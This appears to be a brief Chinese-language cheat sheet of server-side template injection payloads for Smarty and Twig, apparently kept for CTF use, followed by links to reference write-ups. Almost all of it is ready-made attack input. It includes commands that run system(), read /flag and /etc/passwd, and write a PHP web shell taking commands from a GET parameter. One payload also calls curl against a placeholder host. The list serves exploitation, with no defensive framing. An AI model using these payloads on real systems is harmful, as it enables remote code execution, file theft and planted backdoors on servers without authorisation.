主要是记录下一些payload
smarty:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| {if readfile('/flag')}{/if} smarty中的{if}标签中可以执行php语句
{$smarty.version} 返回版本信息
${smarty.template} 返回当前模板的文件名
使用{php}{/php}标签来执行被包裹其中的php指令 3.1版本已经废弃
{self::getStreamVariable(“file:
{literal}alert('xss');{/literal}
{literal}<script language="php">phpinfo();</script>{/literal} PHP 5.x
{system("id")} 最简单,枯燥的一个
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
{if phpinfo()}{/if}
{if system('ls')}{/if}
{ readfile('/flag') }
{if show_source('/flag')}{/if}
{if system('cat ../../../flag')}{/if}
{php}echo `id`;{/php}
|
Twig :
1
2
3
4
5
6
7
8
| {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter('cat /flag')}}
{{["id"]|map("system")|join(",")
{{["id", 0]|sort("system")|join(",")}}
{{["id"]|filter("system")|join(",")}}
{{[0, 0]|reduce("system", "id")|join(",")}}
{{{"<?php phpinfo();":"/var/www/html/shell.php"}|map("file_put_contents")}}
{{'/etc/passwd'|file_excerpt(-1,-1)}}
{{app.request.query.filter(0,'curl${IFS}x.x.x.x:8090',1024,{'options':'system'})}}
|
链接:
模板注入漏洞全汇总https://cloud.tencent.com/developer/article/1516336
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
TWIG 3.x with symfony SSTI https://xz.aliyun.com/t/7507
TWIG 全版本通用 SSTI payloads https://xz.aliyun.com/t/7518